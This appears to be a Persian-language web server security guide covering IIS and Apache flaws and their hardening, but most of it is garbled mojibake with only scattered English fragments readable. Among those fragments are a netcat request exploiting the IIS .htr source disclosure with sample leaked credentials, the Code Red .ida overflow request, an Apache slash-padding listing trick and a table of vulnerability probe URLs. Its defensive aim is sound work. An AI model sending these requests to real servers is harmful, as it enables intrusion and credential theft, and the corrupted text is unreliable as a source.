TQ +.htr '" ?@ ? 56 -, @ + " E$ " U) ,< Ÿ 1Q 5 H 2 Q /P " • & - ;! 
) , 5< ' 3 =GX - ?@ G0 , 6 1Q 2 0 < Y bB g ' < 7 G:H$5 ) 4IIS 3 " " ISAPI DLL <) ) N F < 6- _Source Disclosure]+ % ' ISAPI DLL % '.htr, 40 , , Y E - 2 " NetCat Ÿ 0 N GET/sitel/global.asa+.htr HTTP/1.0 [CLRF] [CLRF] 5< -,< H R4 S @ ) netcat B ) 9P " - Y a, -,6 f , c:\>nc -vv www.victim.com 80<htr.txt www.victim [10.0.0.10]80(http)open 200 OK HTTP/1.0 server:microsoft-IIS/5.0 date:thu,25 jan 2001 00:50:17 GMT <!--filename=global.asa-->("profiles_connectstring") "DNS=profile;UID=company_user;password=secret" ("DB_connectstring") ="DSN=db;UID=company_user;password=secret" ="DSN=phf;UID=sa;pwd=" ("PHFconectstring") ("sitesearchconnectionstring")="DSN=sitesearch;UID=company_user;pas sword=simple" ("connectionstring")="DSN=company;UID=company_user;password=gu essme" ("email_pwd")="sendaemon" ="LDAP://DIRECTORY.COMPANY.COM:389" ("ldapserver") ("LDAPUSERLD")="CN=DIRECTORY ADMIN" ("LDAPPWD")="SLAPDME" ? $GLOPA.ASA% ' , T 5G 7 5<0 -,< S# ) -, & ,1 7 5B " 6P< , ,< F ISAPI DLL R4 S @ " N 4) 0 < T/0, 3 @ 56- - Y & , 3 6ISAPI DLL ,< ) ) 7 !89 7 ;! F) B , 2 560 < ;! @ MR / 0, MR / ), B !$ - 'X ? GF' B 6 E ) ? DLL 6-, <N MR/ 7 +.HTR + " -,6 Ÿ = B* A) 2 , 6 3 ;. %LY j 5 7 !89 , ‚ ISAPI : 56 +.HTR ? )&' 0 < 5 - -,< ?@ ? j 5 ;! ?@ 1P H GLOBAL.ASA % ' -,6 6 * ') PRINTER ' @ MR / (,! ) , < TG' g 5 6 D l '-, ,! 78# , < ^ I'/ IIS ) < <N DLL @ F 0, - 56DLL I'. @ ) 6% ' 6 4 B' < 15 / 785/ " :A ISAPI DLL+ A $@ CVA6 A &2S AA @ A <: $8S& IIS: + $A 8 # $ h6N 0 :;d > 3 b ; #d >> @ MN( d28 << 8 : 2 ) <N ; ! , 6% ', B$, a, , -,6 T G' g COMPUTER ) $, < ?@ 5< " 6DLL ? 4h U $, DLL PROPERTIES U O* ) •MASTER PROPERTIES •WWW SERVICE •EDIT •PROPERTIES OF THE DEFAULT WEB SITE •HOME DIRECTORY •APPLICATION SETTING •CONFIGURATION •APP MAPPINGS ?@ ) PRINTER , 4 B' MSW3PRT.DLL % '$ %#<0, N <N 6ISAPI DLL @ F) ISS N56 6DLL - 56 @" MR/ < " &2 <N R4 S @ >G " T),F , < 0 & &H " %# < , - P 1 ^ ? < + ! 
" ACTIVE SERVER .ASP BUFFER PAGES OVERFLOWS,MS02- FUNCTIONALITY 018 WEB-BASED .HTR +.HTR PASSWORD RESET SOURCE DISCLOSURE,MS01004 INTERNET .IDC 6 DATABASE ? # <@ Q193689$O) CONNECTOR SERVER-SIDE .STM,SHTM,SHTM1 ' INCLUDE & MS01-044$ ) INTERNET .PRINTER - ' PRINTER & MS01-023 ) INDEX SERVER .IDA,IDQ - ' & MS01-033$ ) FRONTPAGE UNINSTALL FPSE SERVER EXTENSION REMOTE RAD SUPPORT MS01- IUSR ' & RAD 035 SUPPORT ' ) # HOTFIX )PATCH ISAPI DLL +' , & N =B* <N 6 6 g8 0 F) MS01-026, - - R4 S @ 1 ),< 6PATCH " , -,Y -, @ 6-, 5< # @ 78# ISAPI DLL , -, < , ) SL B ) 6% 4 MR/ ISAPI DLL 78# P 9 6S % B 5F " 0 F) 78# N +' ' ) # ‹ R4 S @ () , 7 B) @] 4 ,N - %/ N < ') # A & microsoft security bulletine 5< 6 g8 2 " ( , 6 _, < 0, ,4 ' ) # $, ,F 6PATCH 0 - pqqwT R4 S @ ?@ ") _HFNETCHK.EXE] Š j 4 HFNETCHK # " % P H P 10, 6 -, < - A & ' ) # - 6? , 6 ?# 0, K5 SL ' ) # b -,< ( E -, < K 6 < " (N " ") 0,6 (E$ - ' ("c$ - Y IIS - 5 PHP P ), 6 " # GF F l '7c L. ? @ ) - @ T L. ) UPDAE WINDOWS 6U ) (N $ ' ) # 6 -, < 'X 7c L. g] -,< 'X 7c L. 2 ), \) < -, < 'X 6 ) HOTFIX i: 3 7 !89 , # j 4 -, < K PATCH 2 3@ : 5 HFNETCHK 6 XML B X ! P 1 #P< HOTFIX -, K ) PER1IIS,COULDDUSION I " 1 6 #P< " 6PATCH 2 3@ - - N4" PATCH , I 5< IIS ) ) SERVICE PACK A & ) , b g8 2 p• -, 6 ? 6PATCH % <$ bP ) ("c ? , IIS ("c ) - P ' ) # 0, 6 ( E C IIS 3 _ ') # URLSCAN,IISLOCHDOWN " - Y ISSLOCKDOWN WIZARD ( , #4 0,< )“CUSTOM’ 3 & 1/ IISS L d* 6 '$ IIS SL a T G' g 0 ISS $ l ' ^ P 6U ) 5< -, 6 U ) & d* F 3 : ' ) # $pqqw T j $ ?@ I 7 "7 B, 6 " 3) : 56) % 4 IIS “EXPERT“ u? u T5! ?# $ S -" Fa 2, 0 5 ) • P 1_NNTP,SMTP,FTP,WWW], 5 network hotfix checker 5< I - 5 -, < K b C 5! 6 5 MR/ )_,< T) , 5 7 < " $O) . 6 ISAPI • ?@ F) + 2 `56) IIS Z F " O) -, 6 U ) 0_TFTP.EXE )CMD.EXE I ] g % N ]WEBDAV ? 5 T G' ga 'X b. # EXTENSIONS ? - Y ?5F gaSCRIPT 5 T G' MAPS• _PRINTER)ISM)IDQ)HTRa I ] @ 2' R ) IIS CP - -, < - 1 c 6 ' B H" % 6 3 5 ‚, >G P 10, < ? 5 % ! N 5 E 6 PF - ) 4 3 7 L* " IIS W L* #4 #B 5! ) O) -, 6 U ) ) % 9 ? 
B F 5 ) ,< - & aURLSCAN• B' ˆ 6 6hotfix) SERVICE PACKS L - , # $, , 6 " @ ˆ6 ) IISLOCKDOWN0, & 6 PF " ) S L ) " " , 2 ,F 7 # ?@ 6& ? " URLSCAN$ -, 5 (E , "), ) IISLOCKDOWN #4 3 IISLOCKDOWN0 0,< %'g N @" @ I'. ˆ 62 `56$, 6 ) L* ) X ? 5 B3 URLSCAN L , P 1 5<0 < SL _IISLOCK.EXE] IISLOCKDOWN a, 6 ( E C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES IISLOCKDOWN n 9 " URLSCAN SL ,< N A) 0 < SL , , , ' -, ISAPI 3 5L ) ,< 37 URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN ,< ,< P 1 B' URLSCAN.DLL0 IIS # " % PH ) , , % 5! % K/ H$SL , ?56 H IIS B F ) # 4 % ' URLSCAN.INI ) , % B . ' R4 URLSCAN ISAPI b , PHTTP 3 @, \ $, % ' P 1]0 < - 3•SL URLSCAN.LOG ( ?56 3•URLSCAN.MMDDYY.LOG( - 2 #5 A & HTTP 404 OBJECT NOT v 4 , HTTP 4 P [ FOUND ' 5 URLSCAN , # 4 3 6 URLSCAN_ < 3 0, " % ' ? a 'R ,< _- g ) HEAD)POST)GET, 7 5B ] -,< , 5 H2 3 3 , , 6 3 ,G ;/P ] V # <) h … 4h … 6URL h … B', -,< & _,< 6URL NON-ASCII 6 " 3 : X nP9 , 6 >/ h … 3S >/ h … 6, @ >/ h … W L* F) d * 6 4 2 " (, 6 0, < <R URLLSCAN.INI % ' 6) < & IIS ?,< F ? " , 0 < " , - - ) IIS < b' URLSCAN.INIa # T5! " b'?@ #P< 6" , 7 " B') , - B) N " ?) 5 ? , 4 bB 4 2 ,@ #6 , ) F ? T/0, ) F) 3 -, B' ? ,63 B $ H 5 2 ) 0, • !" " #$ % - 0 H % PH " TCP SYS & 4 % 7 ) ) z 3 % j @ N$, 5 )$ < * +! - 4 & 21 ) H @ &F b' ' (! " ) 5 0% F O) ) ?@ - B' 26• c 5G 6 F) 3 %3 " 7 9P -, u (E ^P #P< 6 3 6 , < 5 V B, @ ], < %3 \) < 6 ?) 3 , * 4 , E 2 ?# 2 P 1 ) ) _€ Y + H) P[ ) V , -, •Y ? )" H)$ )0 \X & 2 ?, 5 ' B IDA/IDQ ISAPI 6, 4 ) 6-, <N NIMDA)CODE RED ( 2 0, % ) ) pqqw T + H) P [ % ', , " 3) - 1 @ " ), ' ) # " B 5/ ' & f 2 , ,F , 1 ;! ? < 3 6h) ) , 56 & 2 " R4 S @ . CODE RED ( P < B 3, <) " N ISAPI DLL TP $,< -, 6) , " pqqp -,< - 1 @‘ ‘ 6) GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0 U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7 0, E - 1 @ \X %SYSTEM%\NOTWORM 2 -, 6 ? - 1 @ CODE RED ( 2 `560, < ,4 u( 2 ,< 7# 2 N4 @V# 3 < 0, 6, 9 2 -, 6 ? 
$ - + H) P [ 6% ' 5I 7 0, < ; +!0x90 0x90 %u9090 # : ,< % ' ROOT.EXE % ' >/ - 1 @ 6% '2 `56), 560, >/ TQ ? ! X /T / "), ) % < 7 NIMDA( ,< ) % ' ,G 2 `56NIMDA)CODE RED 6 - ./0 ( 7 , ) H? , " , 8 + 5 5< , +1 2 " 34 5 6 nop " @A x86 = U4 4 78 > ? 8 6- "( 7 < -source code #' , < , :B g e '2 0 N , 6U a " SQL 7 , ‚, < " 5 5 <+ % 5< 6:3 2 B) - -N4 '%# IIS 6, ?, 5! " ^P 1#< 2 4 .INC @? 0 !89$% 5 h @ , T5! ,< 6, ( ? 4 ) j 4 I 7 R4 S @ ? 2 " %P H U 40 , < - @ , R4 S @ ) , < - 85/ 2 & 7 5B… INCLUDE B'" - Y … # . # ) ?) 0, 0 6 3 ;. %LY <) 2 9 " R4 S @ ^ @ +' F 6N 4 , )- ,4 N - # 3 ,G ;/P HTTP GET R4 S @ OK(/DEFAULT.ASP /DEFAULT.ASP+.HTR +.HTR SOURCE DISCLOSURE ERROR PERFORMING MS01-004 /FILE.STM,.SHTM,.SHTM1 WEB QUERY 500 j 4 2 ? N SOURCE MUST BE PRESENT 500 # , < R4 S @ v 4 j 4% H 200 I'. 3$, 6 ( E 5< B ! ( ,H - 3 #P< I 7 ?@ " ?5F ? 7 .X … ?5 3 , " # 7 L u2 & N Y* 7 !89 6 <… < ASP 00 ) & 7 5B$ , S# 2<) ) iX ) ? GLOBAL.ASA % ' 2<) ) .ASP, `@ H U ˆ6, >G , 0, < ) d* INTERNAL ERROR;HTML ERROR IN WEB SERVER DIRECTORY PATH DISCLOSURE ,Q193689 /NULL .PRINTER .PRINTER CONTAINS BUFFER OVERFLOW ,MS01-023 PRINTER INSTALL 200 OK;HTML CONTAINS /NULL.IDA,IDP INDEX SERVER BUFFER THE IDQ FILE..COULD NOT OVERFLOW,MS01-033 BE FOUNS 200 OK;HTML THE CONTAINS FORMAT /NULL.HTW WEBHITS OF SOURCE DISCLOSURE>MS00-006 QUERY_STRING IS INVALID 200 OK (/FILE .STM MUST BE /FILE.STM ,.SHTM,.SHTM1 SERVER PRESENT) 501 NOT IMPLEMENTED SIDE INCLUDES BUFFER OVERFLOW /_VTI_BIN/_VTI_AUT/FP30REG.DLL FRONTPAGE SERVER EXTENSION BUFFER OVERFLOW,MS01-035 a+ 1-HACKING EXPOSED –WEB APPLICATION ,JOEN SCAMBRAY,MIKE SHEMA 2-WEB HACKING –ATTACKS DEFENSE,STUART MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH 3-WWW.SRCO.IR a , , < +H ) B 5/ 6 ˆ60, -,< F 2 ) ') G O) R4 S @ " 5< (E ) 6 ) ?@ n 9 " @ ) 6 2#5 N ,< " 7, , 5 $,< 62 ) #. ) 2 2 `560 < & 21 ) , LH E ) 6) B3 0 ) $ 6$ O) () R4 S @ ) < ;. NETSCAPE) IIS)APACHE? `56 R4 S @ -, 4 2 , N N %B . ) DOS1 785/ 6 ) 'G U ) 6, H @ 15G ) 5! 
0 " 0 785/ 1 , N –denial of service B3 X / T / , G1: $, < , Y -8 j * 2 5< 56 ‚, < ,< 6 N, ) ') ) - )M 6 #< TP BPH " 3 , B3 , / ? ) " # TH APACHE 0 ) 5 O) ? , 6 U ) 78# 4 $_IIS] ) %K 0 CA-2002-17,CA-2002-] =GX - 0 6 ' " 7, , - R4 S @ ? `56) < R4 S @ ^ bP ! ) h / 6- _ ?@ l '? # 4@0, < -)8!0 4@ -, 6 U ) - Y "), ) I =B* R4 S @ ^ B! ? 5 TG' g• , ] -, 6 U • 4@ 6* ? '- 9* H U# 1) U# N & )j 5• • # " R4 ) - " -, 6 U ) 4@ Z F PL $ U 6 ) 6% '2 3 , - 9* 3) -)8! 6 „ 1 # $_27 _DOS] U ) e 'j 4 7 F) & O) -, 6 U ) "$ ?@ 6* & ) 6 " 5 " ,G ) ? 4@$ " \ 2 0 5 SL & , 5 0,< 7 3 O) 7 .Y - H , ) H8! h ?8' 6 , <R 2 3 F S1H ) , 9 , ?@ APACHE 1 )„ ,< - *1 " APACHE 1 )„ 2 56) Pc 3W 3 e ' ) #17 E E 3 - *1 ORF 3 .Y ?8' ) , -,6 4@ O) -, 6 U ) & PHP)CGI R4 S @ ^ F) 7 a ') # 3W 3 # _APACHE] " 4@ , ) 6T)„ 3W 3 S @^ 2 1 ), T25& , ! X I 2 ) 7 .Y 0, , 3 , -,6 7 .Y j 5 ) / 9 y , , 6, -" F , P 4 \ X 2 # 0 ,6 H :3 e G 0 ) 6 5 ) TQ c 9 6SLASH B ) ) MOD_DIR,MOD_NEGOTIATE 1 )„ ? " ? 1 6URL 5F c 9 MOD_AUTOINDEX ? 56 . APACHE R4 S @ 2 0 ,6 j 5 2001 h APACHE 1.3.19 * A8 ) 8 1P 5 1) B " URL 0 B3 j Y0 " B " ,4 P B g O) ) - 4 GH ) , G0, 6 j 5 ?@ B ) # 5 APACHE 6 ) , 2 0, A" 1 2< ? < Y, E #0 & URL :&i2L + $0@ , #4 B) %# 1 )„ 0 ) e 'j )$, . ' H ) , APACHE '& F) 2 %/ (, 6 ) APACHE # ) $,< , 4 B1 ˆ 60 -, @ " H APACHE ) 1 )„ 2 0, MR / # 0,6j 5 0 B 2 MOD_DIR)MOD_AUTOINDEX 47 1, , Q 0,< +' APACHE 1.3.19 2 <+ 2#5 1) ,< 8000 " 4 ? ? ! $ B B3 PERL B 5/ 2 - " ? 5$ /CGI-BIN///////////////////////////////////////////////////S 7) Y ;! MARTIN KREAMER - '4j 4)- " ,G < 93 @ APACHE ? % , 6, j 5 ? " 3 O) ) , - Y , 1 )„ N MR/ ) 1 [ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX APACHE 2 , 60 # ', 6 3 B H" 6 Y 0, Y1* $ , ? ? ) B) - " 1Q 2 P10 3 <8 6 6 BH 2 , ,F ,< 1 2001 c F n 9 , $ APACHE 0 1 " ,< 6 3 P . ,Y (5 [ \X 1 ,6 * -,< e ! '? B , 1NETCAT 6 PASSWORD % '? 
56c / " ) F 3 B 5/ 2 0,< A & BUGTRAQ 0, < -, @ # 2 O) , " KEVINb , a,6 j 5 B APACHE)MULTIVIEWS R4 S @ ) ) X ,4 BRASSCONNON.NET " ,< 4 , -" F ?), APACHE0 $ ) " MOD-DIRT)„ MR / 2 F) 3 P 1 ,< 6) 6 \ 2 B' R4 S @ 2 0,< 0,6 MULTIVIEW ' ? B - , P - ) X g B'0, - N`6 , P$, < V4 ?) 2 O) ? , 6 G 5 # " H) 6 2 \' 21 ) 0 < - 3• B' 6)$ ? 1 0,< ?P 4 * $ 5 ,H R 4 S @0,< < F) @ ?) 6 % H 6 ) B) , ,, h / 6- MOD_AUTH_*SQL j P( <) STUTTGART- N ?) _¤] 7 , 2 P 10, < 0 iX SQL -" F ? " RUS-CERT,2001 1 )„ 4 2 56) < 6" / ?@ 2 0 - 6 3 ;. %LY @ 6" / N N R N F O) , " 9 -, @ 3 \X MOD_AUTH_*SQL • ("c P 10, ") 0, , APACHE , R4 S @ d * - . W L3 a - Y ! ". /0(123& ("c 7 !89 S ) 6h @ " ? $ " 6 @ I5 4@ O) -, 6 APACHE 1.3.X h @" ? 1 2 " U4 +$ U) @ MOD_AUTH_*SQL - Y ", - - ) SQL P< • : HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13 h @" ? APACHE 2.0.X HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20 ) R4 S @ d * " - Y 0, <P 0 ,Y - . I 5 ("c '7 !89 G X) Z W K a 6h @ ("c 7 4 & HTTP://HTTPD.APACHE.ORG/a h @ "2 APACHE O) -, 6 U ) 0 L3 $-,< - < "7 K 4$ "7 " 4@ O) -, 6 U ) 4$ DY/ B <) DY/ I 5 4@ O) 2 3@ SL " ? 59…w HTTP://HTTPD.APACHE.ORG/h @ " ? 5 - Y levels PATCH) 6 * h @" ? 4@ : GX) 2 3@ " 2 6@ Q CODE SOURCE 6* … I5 I … 0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/ ? @ " +F ? ! . I 4@ % ! ) X - < R4 S @ ^ 1 )„ C' # 2 " $ . - "2 % 5 0, 5 6-" $ -, 6 U ) O F$ 4 0 ? G “/“ - Y G', % ' 5 -,6 6 c H, ), . $ l ' ( : ?@ ), . -)8!0 0, @ # 0 5 ?@ '# ,6 * 6U ) H CHROOT/HTTPD| 0 LOGIN SESSION " 5 ) ?# $, 5 " g@ 3 6- Y Z 6- Y # 6 ' ) -, < -, F W L3 $l ' 3 6j* G', c 2#5 $ ) -,< -, 3 'SHELL ", 8Q0, C L 3 'SHELL 15 / - Y Z E /CHROOT 1G') Z F CHROOTED 7 S 2#5 $ $ , 6 F W L3 4@ F) CHROOT " z 3 ) % ! 15 / F 3 < 4@ -, 6 U ) F CHROOT b . 8Q0 C ) F & 7 I ) G ; ! CHROOT CHROOT0 5< l '-) B 4$ CHROOT…‹ ,E = ,4 2 W 3 ^ P> F ) ROOT ? G, F " …s E " E %H ,/ W 3 6) - ),. ,E = G ;! ) #B 5! 4@ 0 < ,6 * / 0 - Y - 5 - Y _CA-2002-23] OPENSSL ) , ) X 4@ 2 5 MOD_SSL(CA-2002-27) ( % I 2, F ("c : ("c0, 0 ) !PATCHING " ? 
59…p ,B F S 4@ 2, 0 < ,6 * 5 ? G0 5 ? G0 H CHROOT E E 15 / /BIN/SKY 4@ CHROOTING ) !89 , " ?@ I5 <& $ CGI,PHP 6 6U) ,G +P - ^ P 6 A) 0,< < TP, &'( 7, 3 ?@ # P ) "E 6 ,' 1G'\ 6% 6 •c 4) 6 S , ?# $ S !89 , ) BH$ @ R3 4@ -, 6 U ) 0 '#< ) [ 6 '$ -, 6 U ) < $ , 5 ' K LOGGING 0, 5 (E 2, 0 < I 5 …Š ) -, 6 U ) ("c 2 40 6% ' + K W L3 ?# " W 3 I ) 1 )„ F) CHROOTING < B K LOGGING 7 B 5! g * ("c 7 , 5 ? @ &1 R 4 M :G H 9P ("c$ O) -, 6 U ) 2#5 F %K W L3 I 6 #6 -, 6 U ) W L3 c ("c P F7 [ , b. F 3 - Y $ 9 1G'W L3 ("c 0, 5 B : I 5 O) -, 6 U ) ? G$ I ) # 2 : 6% ' 7 L g ' ) F 7 !89 a,< ,6 3 6 '? @ a 5 - Y "+ " , •c 7) Y h @ " APACHE 6 ' ) <@ I5 1.3.X … < HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML APACHE HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X - Y 0 < •c P ) F 6% ' . 2#5 -, @ j 4 ^ < ) CGI,PHP " 6 „ 1# &1@ ? j &' I 5 ? •c0 5 POST,GET ^ MOD_SECURITY n 9 " , 6•c F # ) ) )Y l ' GX)0,<P ' ,, $ - Y # P [ ( ,H $ =GX " - Y Z POST ) GET bP 7 B 5! ? 5 0 R4 7 _DETECTIOMN INTRUDER] 2 5/& d * l' 0, 5 N 4 K F O) S W L3 j< 4 " $MODSECURITY0, 5 U) MODSECURITY ) ("c 6 < 6 'O) N 4 ) ,< O) -, 6 U ) 6 ^P - 56 F 0, 5 5/ " 4@ -, 6 -HTTP://WWW.MODSECURITY.ORG/ •-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12 6 ) SSI,CGI,PHP…• # a ,F ) X # N ], K5 TG' g 4 # I ,! T G' g 2 < F) ? @ : SERVER SIDE INCLUDES ", 3 : ) SSI,CGI,PHP… 6? " _,< Z " 6, F ;! ) , 6 '-, 6 U ) SSI… " - Y 0, K5 ) SSI,CGI,PHP " # 6? " # F ? # $SUEXEC0 < - Y SUEXEC " 6 ' APACHE USER ID H ^ , 5 6 ' USER ID , 6 3 MR /$ ? 5F 7 7, , S b , < ("c j SETUPID ROOT , 4@ . . CGI)SSI L 3 CGI)SSI ) 6 @ 3 <) S SUEXEC " - Y ) / 0, 5 6 F 3 ' 6 F) , # 4 (,! #B 5! - . ) 6- Y/ ") <@ - Y ;! I ) : a 5 - Y a < - Y 6 SUEXEC " -,Y 0, < ( 0,< ,6 3 N h @" ? - Y 2 , 0, < O ) -, 6 U ) -, < < P - 5 ?# 2 SUEXEC 4@ ? … $ USER ID % P 7) Y USER ID 2 < ? # ) j6 ) X # " h @ " APACHE 1.3.X 3 2 " 6 … HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML a < " h @ " APACHE 2.0.X - Y … HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML ) CGI-BIN % < , MR/$ 5 e 'j 4 6 . 
W L3 # 5 ("c … ("c ) ( E 6 # PHP " ) - z 3 1 2 B / " S1: a 0 HTTP HEADER F - < W L3 2 7 !89 K ;! SAFE 1/ h @ " ? W l '\ X L3 2 23 5 ) K6 PHP 25 4 C ' 4 ? 5 TG' g… F " ? 59 T L/… B5# 7 !89 ' HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706 T)„ 8Q 0 G X) XSS:CROSS SITE " ? W L3 2 P % I 'X ) … MOD_SECURITY DY/ ; ! , B5# 7 !89 -,6 1 )„ " - Y 0 < SCRIPTING <@ 0 5 - Y HTTP://MODSECURITY.ORG/ h @ SQL INJECTION &XSS % < R 4 S @ ^ ( 0 5 - Y h @ 2 P h ,G 6 6 & " ? : ) &5 … 0 56 &K/ & H]NIKTO & % " 2 # ' # _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML 0 CGI ) j 4 6& R Y 9f !" #" $ % !" 1 23 4 0 &'( 7 !89 " 0 25 ?# A 5L M 9 N M 9" ) , < % ! ) ! $ @) F 7, , 6 &1@ ) (E $ F : ), 6 - % ! " /) 56% ! -") ) 'D ? , , - . 6;. " - 56 $ ) 5B !C 8 %K &' * + : -,< =! > ?@ J ) # $% ! GH ) 5 2' O* ! 5E 2 ' I I H? " ?@ P 4) ,N 0 ,G R4 S @ 3W 3 P B 9 2 F) % 1 $ ' ?5F ' 785/ 0 T) , % ! ) - 5 - Y $-,< 3 < , * $ 3 M, 6 " 6 % ( $O * 7 2 5 " ^ L ) ?5F 6 @ 0, 5 " - Y H7 E ) F 78# 2 5 =GX F) B ! $ R4 S @ ^ R4 S @ d * ? &560 " 6& $? 5F ) 6- Y/] Code Red ) $7 !89 : 6A) " $\ R N6 2 $% ! 3 0, F %K ? @ > GP 8 $ Ba I K6 6 ? " V, I 5 ,G * $M,6? G ) X )? " R4 S @ ^ K 0, 5 #P < "), ) - .) & 5 Q 6U ) ) [ 3 _ R4 S @ ^ N &1@ ) K < 0 c - ) 6? " N` 6?), ) - # M 9 6 =GX - Y Z I , ) 6( R4 S @ ^ < b R4S @ I 5 -, < 2 ), 5B ! 7, 0, < S 0,< ,6 3 K c ! 5E 6 'G " U4 $ 2 0 3 % ! 6 $ N 4 ) B 6A) $, , e G $ R4 S @ ^ " 6% DY/ 4 63 R4 S @ ^ 2 5 $_ 1 f 4] "), ) 0 3 R4 S @ ^ F) " [ &1 @ ) K < 0 )@ h < 6 A" ? " , ) " ? , 0 =GX - " ) 6 S " 6 ! 5E 1) U# - < F 4 ) A8 % L/ $% ! 7c 9 $U 785/ ) 7 , , SB g $, - <?@ R4 S @ ^ ,F 7c 6 '? 5F #P< ) 0 4 63 bP 56 % ! 6 ? F i: R4 S @ ^ -, " ) 0, 6 ( E ("c 7 ,H ) <@ ? @ % ! 6 F 6 ! R4 S @ ^ 3 I 5 ("c 6%5G1 % <) bP B5# ) , Y 7 !89 K6 4 1 &'( )* !#+ i: - K6 F -) -") - F 0, 5 "), ) - ? F 25F b % ! 6 , G 785/ ? - Y % ! R4 S @ ^ f ? G _7) Y 2 5 ? 
" 0 # "), ) - Y G ) 6 * ] "), ) " $-,< ( E - )\ a 5 • Internet Information Serveces (IIS) • Microsoft SQL Server (MSSQL) • Windows Authentication • Internet Explorer (IE) • Windows Remote Access Services • Microft Data Access Componenets (MDAC) • Windows Scripting Host (WSH) • Microsoft Outlook Outlook Express • Windows Peer to peer File Sharing (P2P) • Simple Nerwork Management Protocol (SNMP) 785/ -,5! ] MSSQL ) IIS 6 3 $_) ) $ 1 2 T) j * 0 3 4 &'( )$,% * Internet Information Services (IIS) 3 IIS R 4 S @ $e 'j 4 , # 4 ) 7 5 I a, 5 6 ' " 7, , ", ) -, _ 3] G 0, 5 I K6-, " 4 j 4 0, 5 N ISAPI 7 B 5! ( E - Y $O) Y 6ISAPI 6 B'" $IIS 0, 5 ,F ) W 3 7 B 5! (&B $ISAPI _SL ] IIS SL ? " ) Code Red, Code red 0, < P 4 F - Y 0, < - Y V < ) Server Side (SSI) Includes $Server Pk ) - PSL 3 M ,6 4 " IIS K6% '^ P ) N P56 I 5 _ < bP 0, 23 , - 9*5 • % K6% '] ISAPI -,< 3 < % ISAPI " PHP ) Coldfusion Active ZF• 37 -, 6 U ) W 3 ,G ) 6% '23 , - 9*5 ) j 5 • h / 6- DLL O G 7P [ ? 5 TG' g • _DOS] b) 6 B'? @ SL ? 5F l '=GX " b " ,G ) e 'j 4 7 L C 85! - Y Z ,< 6 B'" O * % H $l ' 6 B' Q 6 " K6 5 0, - 5 - Y 5 l ' 6 / 9 H F ,1 ) " ) -,6 , 6 P! & I & IIS % < $O) ? , 6 U ) 0, -, < / 9 $O) -, 6 U ) B 5! b . ? # IIS - 5 < K I h / 7 !89 7P [ I5 %K ? 5 m.1 ? @ #B 5! 6 K 5 " ) - " 3 0 ) - *1 0, 5 6' 'N 6% ' N " $ 1 ) SL " U 4 IIS S ntdll. Dll Web R4 S @ ^ ) 6 ' _U ) ? 5 T G' g] Dos \ U) ) 8Q 0 )@ C 3 I H ? 5F $ F 6 ) nH 6 3 ], < 6 ' ? 5F F " " 785/ ? # IIS5.0 # R4 S @ ^ , N ) ( N (, ! F) E F H ?5F ) N -, 6 U ) ) DAV 0, -, 6 3 - *1 7 F 0_URL SL IIS ) 7 ) X , ,F R 4 S @ ^ =GX o F) F ") ) i. ) K6% , # 4 (,! % 1 , , & IIS ], 5 4)7 # & PHP, Coldfusion ", $ R4 S @ ^ ,< 0_ N T L. -, < SL T L. T L. T#< ) " 6=GX ) 78# - Y IIS 5.1 * 0, 5 - Y IIS 6.0 " pqqs "), ) ) G:H 785/ % IIS K , # ) -, 7, ) ' ) # I5 ? : 0 5 - Y 2 ) % < ' ) # 2 < IIS 1t K A & ? L IIS 0, 5 # S L ?@ ) #P< ) 3 0, 5 ( N IIS S " IIS ^ ? 
, 0 6 & 2 , ,F & : 0 &'( )3 45 678 R 4 S @ $, < -, , N $S L XP"), ) • l ' R4 S @ : ) e 'j 4 7 l ' pqqq "), ) • Professional * " !" ) SL NT 4.0 "), ) • -, 6 U ) 0 6Patch 0 1 !" - Y IIS 4.0 " - Y q$r IIS " 0, 5 I ] 0, N 0, 5 6 ' 2 +. / 0, 5 6h @ , bP Baseline Securiy Microsoft Analvzer ,6 3 $, -, ! : -,< 7, 0 4 GX) I 5 ?@ " ) ' ,G !89 + K 3j $ F -,< - IIS GX) ("c ') # #B 5! 0 bP ) S b R4 S @ ^ . " $ 'S +H ) , Y Cheklists a I -,< K , "2 " - Y , $ B / , ,F =GX ^ Auto Update , windows Update 0 0 6Patch 2 3@ -,< K ,6 * 6Patch 6 h @" ? ' IIS " ) - " l X ! ) - @ T L. 6 Update ? # ^ Patch " ) X I5 S ) B . * I K6 & )j 4 2 3@ 0, -,< K Patch 2 3@ ) b 6 6 ("c 5 K XP < " # - Y IIS - 56 PHP ("c 0 5 SL IIS -, < 'X 6 : Patch % < $ ' ) # _ ' ) # 1 ) http://www.microsft.com/technet/security/tools.hfnetchk.asp 6? , ' ) # (N K - Y % H l ' & 0, 5 ' & ) Perliis, CouldDusion " ' ! "), ) ) pqqq "), ) NT 4.0 "), ) ) 0 6Patch Checker Network Security Hotfix (HFNetchk) ? , F 9:; 678 5 ( N $-, < K - Y F # O B : 26= $> Patch * <)( 1 ) =< 7" 5 0 % ) ) ( N6 K6A) " Patching 0 -, < S L -, 6 U ) <" @ 7 , 6, @ '? 5 TP &'( )$,% IIS DY/ 6 $ #P< ? , 0, @ %5G - Y IIS " - Y i: Z IIS ,< -,< K < g] -,< 'X 7c L. -, < ( E " (N P ) GF l '7c L. 6 F 6U ) ) Windows -, < 'X 7c L. " ( N6 ? , 0, 6 ( E 2 *B#, ( 7C $ Lockdown IIS ?@#A$ bP ? @ ) ("c 6 ("c ) - P 3 6 :! IIS IIS &) IIS SL K h @" ? 0 5 F 25 I * 0 - & < ') # Lockdown -, 